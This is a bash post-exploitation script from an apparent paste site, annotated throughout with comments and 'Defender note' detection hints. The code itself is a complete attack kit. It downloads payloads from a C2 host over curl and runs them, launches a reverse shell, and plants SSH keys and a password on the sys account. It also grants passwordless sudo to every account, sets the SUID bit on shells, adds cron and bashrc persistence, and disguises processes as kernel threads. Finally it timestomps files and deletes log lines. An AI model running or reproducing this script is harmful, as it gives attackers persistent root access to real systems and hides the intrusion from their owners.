squelch

partay.sh.txt

Mar 26th, 2017
  1. #!/usr/bin/env bash
  2. set +x
  3.  
  4. # ===== DEFINITIONS ======
  5. C2_IP=172.31.35.44
  6. C2_PORT=5555
  7. #C2_IP=52.43.3.214
  8. SHARED_PUBKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCutP0PLd7ktP96z2OPTCjvLSq1XxaxndU8Gi83vKdjtKtJh3GuDXulFRZYHBogO+zoolte59lzWMu0qFkLq1TVGRoYohfmCsguQI6kcXBfjkO43ZOydbLEn2AhrouOZ1BjIJIwRqDVAeoDe2nX+0Jhq1kvKzYsh2WJANHuBWEKzopsaryWYnXu9ESyYXylFioQbyoeLT9gdZ2e7N9dx+d0ntsQN9zjBVUh/5CrZkwM91tiM24D5NZ+/2jT2ypXiVFNSV1hxKZLQJgHqbUh0qvwXh3gcSLkjoZltIxxMi0Ylz5dfpI54ZJviczeyeiDa9qe5dW6C0KOKEtX+g87mg9b"
  9. SHARED_PASSWD="theallegedparadigm"
  10. DOWNLOAD_DIR="/etc/udev/conf.d/ "
  11. DECOY_NAME="[kworker/2:0]"
  12. # ========================
  13.  
# Anti-forensics: truncate the login records read by last(1)/lastb(1).
# The glob sits in a redirection target: bash truncates the single match, or
# reports "ambiguous redirect" (and truncates nothing) if the pattern matches
# more than one file.
# Defender note: a zero-length wtmp/btmp with a fresh mtime is itself an
# indicator; unlike the other files touched by this script, these do not get
# a spoofed mtime. Remote/forwarded auth logs are unaffected.
clear_logins() {
cat /dev/null > /var/log/wtmp*
cat /dev/null > /var/log/btmp*
}
  18.  
# Print the path of chattr, falling back to /usr/bin/diff2 (the name that
# nochatrr() would rename chattr to). Callers capture the output as $xchattr.
# If `which` prints nothing, the unquoted expansion leaves `[ -f ]`, which is
# true for a single non-empty argument, so an empty line is echoed and the
# callers end up running "-i <file>" as a command.
my_chattr() {
if [ -f $(which chattr) ]; then
echo $(which chattr)
else
echo /usr/bin/diff2
fi
}
  26.  
# Plant $SHARED_PUBKEY in four authorized_keys locations and make sshd honour
# two of them. Globals: SHARED_PUBKEY (read), xchattr (written; not local).
# Uses my_chattr() above and reset_mtime() defined further down.
# /dev/.ssh/ is created by enable_sys_user(), which partay() runs first.
# Defender note: artifacts left here are /root/.ssh/authorized_keys1 and
# /dev/.ssh/authorized_keys (non-standard paths), /etc/ssh/authorized_keys,
# an empty /home/sys directory, the immutable bit (+i) on every listed file
# and on sshd_config, and an "AuthorizedKeysFile /etc/ssh/authorized_keys
# %h/.ssh/authorized_keys" line appended to the end of sshd_config. mtimes
# are copied from /etc/issue, so compare ctime instead (the kernel still
# updates ctime on every write and on touch itself).
install_ssh_key() {

if [ ! -d "/root/.ssh" ]; then
mkdir /root/.ssh
fi

if [ ! -d "/home/sys" ]; then
mkdir /home/sys
fi

declare -a files=("/root/.ssh/authorized_keys" "/root/.ssh/authorized_keys1" "/etc/ssh/authorized_keys" "/dev/.ssh/authorized_keys")

for i in "${files[@]}";
do
# Clear immutable bit, append key, spoof mtime, re-apply immutable bit.
xchattr=$(my_chattr)
$xchattr -i $i
echo $SHARED_PUBKEY >> $i
reset_mtime $i
$xchattr +i $i
done
# sshd is not reloaded here; permit_root_login() does that later.
$xchattr -i /etc/ssh/sshd_config
echo 'AuthorizedKeysFile /etc/ssh/authorized_keys %h/.ssh/authorized_keys' >> /etc/ssh/sshd_config
$xchattr +i /etc/ssh/sshd_config
}
  51.  
# Force root login and password authentication on in sshd_config, then reload
# sshd. The sed patterns are anchored at line start, so only an existing
# uncommented "PermitRootLogin ..." / "PasswordAuthentication ..." line is
# rewritten; a commented default ("#PermitRootLogin ...") is left as is, and
# the outcome therefore depends on the file's prior contents.
# Globals: xchattr (written). Uses reset_mtime() defined below.
# Defender note: the service reload is typically logged by the init system,
# and sshd_config carrying the immutable bit is abnormal on its own.
permit_root_login() {
xchattr=$(my_chattr)
$xchattr -i /etc/ssh/sshd_config
sed -i 's/^PermitRootLogin .*$/PermitRootLogin yes/' /etc/ssh/sshd_config
sed -i 's/^PasswordAuthentication .*$/PasswordAuthentication yes/' /etc/ssh/sshd_config
reset_mtime "/etc/ssh/sshd_config"
service sshd reload
$xchattr +i /etc/ssh/sshd_config
}
  61.  
# Timestomping helper: copy /etc/issue's access and modification times onto
# $1. touch -r sets atime/mtime only; the kernel sets ctime to the current
# time on that change, so `stat` still shows when the file was touched.
# Argument: $1 - path to the file (unquoted, so it must not contain spaces).
reset_mtime() { # takes a file name
touch -r /etc/issue $1
}
  65.  
# Fetch http://$C2_IP/$1 over plain HTTP (silent) into the staging directory
# "/etc/udev/conf.d/ /" (note the trailing space in the directory name) and
# spoof the file's mtime. --create-dirs makes curl create the directory
# itself if setup() has not. Argument: $1 - file name on the C2 host.
# Globals: C2_IP (read).
# Defender note: an unencrypted HTTP GET to $C2_IP and a directory under
# /etc whose name ends in a space are the observable signs of this stage.
get() { # takes a file name
curl http://$C2_IP/$1 -s --create-dirs -o "/etc/udev/conf.d/ /$1"
reset_mtime "/etc/udev/conf.d/ /$1"
}
  70.  
# Turn the normally locked "sys" account into a login account: replace the
# "*" password field of the sys entry in /etc/shadow with a hard-coded $6$
# (sha512-crypt) hash, give sys a /bin/sh shell (the usermod line is
# duplicated), and create the hidden /dev/.ssh/ directory that
# install_ssh_key() later writes to. The "#pass=lol123" comment is the
# author's claim about the hash's plaintext and is not verified here.
# Globals: xchattr (written).
# Defender note: a "sys" shadow entry whose second field is not "*" or "!",
# a /bin/sh shell for sys in /etc/passwd, and a /dev/.ssh directory are all
# indicators. The immutable bit on passwd/shadow makes routine account
# management fail until "chattr -i" is run.
enable_sys_user() {
#pass=lol123
xchattr=$(my_chattr)
$xchattr -i /etc/passwd
$xchattr -i /etc/shadow
sed -i -e 's/sys:\*:/sys:$6$OkgT6DOT$0fswsID8AwsBF35QHXQVmDLzYGT.pUtizYw2G9ZCe.o5pPk6HfdDazwdqFIE40muVqJ832z.p.6dATUDytSdV0:/g' /etc/shadow
usermod -s /bin/sh sys
usermod -s /bin/sh sys
$xchattr +i /etc/passwd
$xchattr +i /etc/shadow
mkdir -p /dev/.ssh/
}
  83.  
# Set the immutable bit on /etc/passwd and /etc/shadow (through whatever path
# my_chattr() returns) so later account changes fail. Called by partay()
# after all account edits are done. Globals: xchattr (written).
# Defender note: `lsattr /etc/passwd /etc/shadow` showing "i" is abnormal.
immutable_users() {
xchattr=$(my_chattr)
$xchattr +i /etc/passwd
$xchattr +i /etc/shadow
}
  89.  
# Fetch the "trixd00rd" payload via get(), rename it to the kernel-thread-
# looking name "[kworker]", mark it executable and start it detached with
# setsid from the staging directory. Not executed by partay() in this
# listing (its call is commented out). $binname is unquoted in the setsid
# line, so "[kworker]" is subject to bracket-glob expansion before exec.
# Globals: C2_IP (read), binname (written; not local).
# Defender note: a process named "[kworker]" whose /proc/<pid>/exe resolves
# to a file under "/etc/udev/conf.d/ " is the tell; genuine kernel worker
# threads have no exe target and PPID 2.
drop_trixdoor() {
# run server. Change binary name although won't help much
# setsid ./trixd00rd -i eth0 -s 1 -b 5555 -c 172.31.35.44 -d -x
get "trixd00rd"
binname="[kworker]"
mv '/etc/udev/conf.d/ /trixd00rd' "/etc/udev/conf.d/ /$binname"
chmod +x "/etc/udev/conf.d/ /$binname"
pushd '/etc/udev/conf.d/ '
setsid ./$binname -i eth0 -s 1 -b 5555 $C2_IP -d -x
popd
# client command => ./trixd00r -h 172.31.8.127 -s 1 -p 5555
}
  102.  
# Fetch the "rooty-release" payload via get(), rename it to "[bioset]", mark
# it executable and start it detached with setsid from the staging directory.
# Not executed by partay() in this listing (its call is commented out).
# Globals: binname (written; not local).
# Defender note: as with drop_trixdoor(), a "[bioset]" process backed by a
# real executable under "/etc/udev/conf.d/ " (see /proc/<pid>/exe) is not a
# kernel thread and should be treated as hostile.
drop_rooty() {
# run server. Change name of binary, ex [kauditd]
get "rooty-release"
binname="[bioset]"
mv '/etc/udev/conf.d/ /rooty-release' "/etc/udev/conf.d/ /$binname"
chmod +x "/etc/udev/conf.d/ /$binname"
pushd '/etc/udev/conf.d/ '
setsid "./$binname"
popd
# setsid ./rooty-release
# client command => python client.py -i eth0 -d 172.31.8.127
}
  115.  
# Grant passwordless sudo to every account and put every account named in
# /etc/passwd into a newly created "admin" group. Globals: xchattr (written).
# The two touch lines contain an unquoted "*", so every file in the current
# working directory also gets its mtime set to /etc/issue's, alongside
# /etc/passwd and /etc/sudoers. The awk output is word-split per user name.
# Defender note: the artifacts are an "ALL ALL=(ALL:ALL) NOPASSWD:ALL" line
# at the end of /etc/sudoers, an "admin" group containing every user
# including system accounts, and a cluster of files sharing /etc/issue's
# mtime. The groupadd/usermod calls are what clean_logs() later tries to
# scrub from the local logs.
everybody_gets_root() {
echo 'ALL ALL=(ALL:ALL) NOPASSWD:ALL' >> /etc/sudoers
xchattr=$(my_chattr)
$xchattr -i /etc/passwd
$xchattr -i /etc/shadow
touch -r /etc/issue * /etc/passwd
touch -r /etc/issue * /etc/sudoers
groupadd admin

for user in $(awk -F':' '{ print $1 }' /etc/passwd); do
usermod -G admin -a $user
done
$xchattr +i /etc/passwd
$xchattr +i /etc/shadow
}
  131.  
# Copy /bin/sh into the staging directory as "st" and set the setuid bit.
# When this script runs as root the copy is root-owned, so executing it
# yields a root shell to any local user who can reach the path.
# Defender note: `find / -perm -4000 -type f` surfaces it; a SUID file
# anywhere under /etc is abnormal.
my_root_shell() {
cp /bin/sh '/etc/udev/conf.d/ /st'
chmod u+s '/etc/udev/conf.d/ /st'
}
  136.  
# Set the setuid bit on a list of shells, editors and find.
# The array holds one element containing all the paths separated by spaces;
# because $i is unquoted in the chmod line, word splitting turns that single
# element back into separate arguments, so each path receives u+s. The
# $(which ...) substitutions are expanded when the array is built; a missing
# tool contributes an empty string that vanishes in the splitting.
# Defender note: SUID /bin/sh, /bin/bash, /bin/zsh, vim, nano and find are
# classic local-privilege-escalation artifacts; a SUID audit or package
# verification (rpm -V, debsums) flags them.
suid_all_the_things() {
declare -a files=("/bin/sh /bin/bash /bin/zsh $(which vim) $(which nano) $(which find)")

for i in "${files[@]}"
do
chmod u+s $i
done
}
  145.  
# Download "perl-revshell.pl" via get(), store it as "/etc/udev/conf.d/ /default",
# make it SUID and executable, and launch it detached with the C2 address and
# the literal port 5555 ($C2_PORT is not used here). The same "default" path
# is what so_much_cron() and bashrc() keep re-launching. Globals: C2_IP (read).
# Defender note: a long-lived outbound connection to $C2_IP from a process
# whose command line contains "/etc/udev/conf.d/ /default" identifies the
# reverse shell; the setuid bit on a script file is itself anomalous.
obvious_revshell() {
get "perl-revshell.pl"
mv '/etc/udev/conf.d/ /perl-revshell.pl' '/etc/udev/conf.d/ /default'
chmod u+s '/etc/udev/conf.d/ /default'
chmod +x '/etc/udev/conf.d/ /default'
pushd '/etc/udev/conf.d/ '
setsid ./default $C2_IP 5555
popd
}
  155.  
# Create the staging directory "/etc/udev/conf.d/ " (trailing space) if it
# does not already exist. The test path carries an extra trailing "/" but
# names the same directory. Runs first in partay().
# Defender note: `ls -la /etc/udev/conf.d/` showing an entry named " " (or
# a quoted ' ') is the quickest way to spot this directory.
setup() {
if [ ! -d '/etc/udev/conf.d/ /' ]; then
mkdir -p '/etc/udev/conf.d/ '
fi
}
  161.  
# Delete log lines that would reveal the changes above from three log files.
# The option is written "-ie", which GNU sed parses as "-i" with backup
# suffix "e": each file is first copied to <name>e (auth.loge, messagese,
# securee) and only then edited in place. Globals: C2_IP (read).
# Defender note: those backup copies, when present, still contain every
# removed line and should be collected first (e.g. /var/log/auth.loge).
# Logs already forwarded to a remote collector are unaffected by this edit,
# and the edit itself updates each log file's ctime.
clean_logs() {
sed -ie '/groupadd/d' /var/log/auth.log /var/log/messages /var/log/secure
sed -ie '/usermod/d' /var/log/auth.log /var/log/messages /var/log/secure
sed -ie "/$C2_IP/d" /var/log/auth.log /var/log/messages /var/log/secure
sed -ie '/passwd/d' /var/log/auth.log /var/log/messages /var/log/secure
sed -ie '/Accepted password for sys/d' /var/log/auth.log /var/log/messages /var/log/secure
sed -ie '/Accepted password for root/d' /var/log/auth.log /var/log/messages /var/log/secure
}
  170.  
# Intended to hide chattr by renaming it to /usr/bin/diff2 (the fallback
# path my_chattr() returns). The guard uses "-d", a directory test, on the
# path of the chattr binary, so for a regular file it is false and the
# rename does not run as written. Not called by partay() in this listing.
# Defender note: a /usr/bin/diff2 whose hash matches the distribution's
# chattr (e2fsprogs on most Linux systems) would show this step was run.
nochatrr() {
if [ -d $(which chattr) ]; then
mv $(which chattr) /usr/bin/diff2
fi
}
  176.  
# Intended to hide kill by renaming it to /bin/bzgrep2. As in nochatrr(),
# the guard is a "-d" directory test on the path of the kill binary, so for
# a regular file it is false and the rename does not run as written. Called
# by partay().
# Defender note: a missing /bin/kill or a /bin/bzgrep2 whose hash matches
# the distribution's kill binary would show this step took effect.
nokill() {
if [ -d $(which kill) ]; then
mv $(which kill) /bin/bzgrep2
fi
}
  182.  
# Add a per-minute cron entry that re-launches the "default" reverse shell
# for every user with uid > 500, then for root and sys.
# The last two lines still read "crontab -l -u $user" with $user left over
# from the loop, so root's and sys's crontabs are replaced by a copy of the
# last looped user's crontab plus the new entry; their previous contents are
# not preserved. Globals: C2_IP, C2_PORT (read), user (written; not local).
# Defender note: a "*/1 * * * *" entry pointing at "/etc/udev/conf.d/ /default"
# in the spool directory (/var/spool/cron or /var/spool/cron/crontabs) for
# many users is the indicator; cron logs each spawned job, so the repeated
# launches also show up in the cron/syslog stream.
so_much_cron() {
for user in $(awk -F: '$3 > 500 {print $1}' /etc/passwd); do
(crontab -l -u $user 2>/dev/null; echo "*/1 * * * * '/etc/udev/conf.d/ /default' $C2_IP $C2_PORT") | crontab -u $user -
done
(crontab -l -u $user 2>/dev/null; echo "*/1 * * * * '/etc/udev/conf.d/ /default' $C2_IP $C2_PORT") | crontab -u root -
(crontab -l -u $user 2>/dev/null; echo "*/1 * * * * '/etc/udev/conf.d/ /default' $C2_IP $C2_PORT") | crontab -u sys -
}
  190.  
# Append a line that starts the reverse shell to the shell start-up files of
# every uid > 500 user, and to /root/.bashrc, /dev/.bashrc, /etc/profile and
# /etc/bash.bashrc. The home-directory lookup is an unanchored
# "grep $user /etc/passwd", so a user name that is a substring of another
# entry can match several lines and $home then holds more than one value.
# Globals: C2_IP, C2_PORT (read), user and home (written; not local).
# Defender note: any of these files ending in a line that contains
# "'/etc/udev/conf.d/ /default'" is an indicator. /etc/profile and
# /etc/bash.bashrc affect every interactive login, so the shell is started on
# each login in addition to the per-minute cron job from so_much_cron().
bashrc() {
for user in $(awk -F: '$3 > 500 {print $1}' /etc/passwd); do
home=$(grep $user /etc/passwd|cut -f6 -d":")
echo "'/etc/udev/conf.d/ /default' $C2_IP $C2_PORT" >> $home/.bashrc
done

echo "'/etc/udev/conf.d/ /default' $C2_IP $C2_PORT" >> /root/.bashrc
echo "'/etc/udev/conf.d/ /default' $C2_IP $C2_PORT" >> /dev/.bashrc
echo "'/etc/udev/conf.d/ /default' $C2_IP $C2_PORT" >> /etc/profile
echo "'/etc/udev/conf.d/ /default' $C2_IP $C2_PORT" >> /etc/bash.bashrc
}
  202.  
  203. # Backdoor a binary (e.g. bash)
  204.  
# Entry point: run the stages in order. drop_rooty and drop_trixdoor are
# defined above but their calls are commented out, so they do not execute.
# Ordering visible in this file: enable_sys_user() creates /dev/.ssh/ before
# install_ssh_key() writes into it, immutable_users() is applied after all
# account edits, and clear_logins()/clean_logs() run last as cleanup.
# Defender note: every artifact this script leaves (setuid bits, the sudoers
# line, the "admin" group, the sys account, authorized_keys entries,
# sshd_config changes, cron entries, .bashrc lines, the sed backup files)
# should fall into one short ctime window even though mtimes are spoofed,
# which makes a ctime-ordered file listing an effective triage step.
partay() {
setup
suid_all_the_things
everybody_gets_root
my_root_shell
enable_sys_user
install_ssh_key
permit_root_login
obvious_revshell
nokill
immutable_users
so_much_cron
bashrc
#drop_rooty
#drop_trixdoor
clear_logins
clean_logs
}
  223.  
  224. partay